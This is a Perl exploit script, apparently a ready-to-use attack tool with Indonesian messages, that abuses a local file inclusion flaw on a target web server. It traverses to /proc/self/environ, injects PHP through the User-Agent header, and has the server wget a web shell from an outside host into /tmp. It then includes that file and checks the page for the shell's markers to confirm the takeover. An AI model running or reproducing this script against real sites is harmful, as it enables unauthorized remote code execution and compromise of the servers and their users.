#!/usr/bin/perl

# Simple Shell Uploader via LFI Bugz

use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;

if (@ARGV != 2) { print "\n[!] perl $0 <target> <bug>\n"; exit(); }

$target  = $ARGV[0];
$lfibug  = $ARGV[1];
$environ = '../../../../../../../../../../../../../../../proc/self/environ%00';
$host    = '';
$path    = '';

if ($target =~ /http:\/\// ) { $target = str_replace($target,"http:\/\/",''); }
if ($target =~ /^(.+?)\/(.+)$/) { ($host,$path) = ($1,$2); } else { $host = $target; }

$xpl = $target.'/'.$lfibug.$environ;
$content = get_content($xpl);
if ($content =~ /HTTP_USER_AGENT=/) {
    print "\n[~] Hancurkan $host ... \n";
    my $cmd = "<?system(\'wget http:\/\/pacenoge.org\/tool\/simple_shell.txt -O \/tmp\/temp.log\');?>";
    my $sock = IO::Socket::INET->new(PeerAddr => "$host", PeerPort => "80", Proto => "tcp") or die("\n[!] $host -> Koneksi Gagal !!!\n");
    print $sock "GET /".$path.'/'.$lfibug.$environ." HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: ".$cmd."\r\n\r\n";
    close($sock);
    sleep(2);
    my $check = get_content($target.'/'.$lfibug.'../../../../../../../../../../../../../../../tmp/temp.log%00');
    if (($check =~ /<h1>NoGe WazZ HeRe<\/h1>/) or ($check =~ /<title>NoGe S!mPLe SHeLL<\/title>/)) {
        print "\n[+] 3SUCCESS -> http://".$target.'/'.$lfibug."../../../../../../../../../../../../../../../tmp/temp.log%00\n";
    }
    else { print "\n[!] Gagal.\n"; }
}
else { print "\n[!] $host -> Tidak Terdapat \"HTTP_USER_AGENT\"\n"; }

sub get_content {
    my $url = $_[0];
    my $ua  = LWP::UserAgent->new(agent => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6");
    $ua->timeout(15);
    my $req = HTTP::Request->new(GET => 'http://'.$url);
    my $response = $ua->request($req);
    return $response->content;
}

sub str_replace {
    my $source  = shift;
    my $search  = shift;
    my $replace = shift;
    $source =~ s/$search/$replace/ge;
    return $source;
}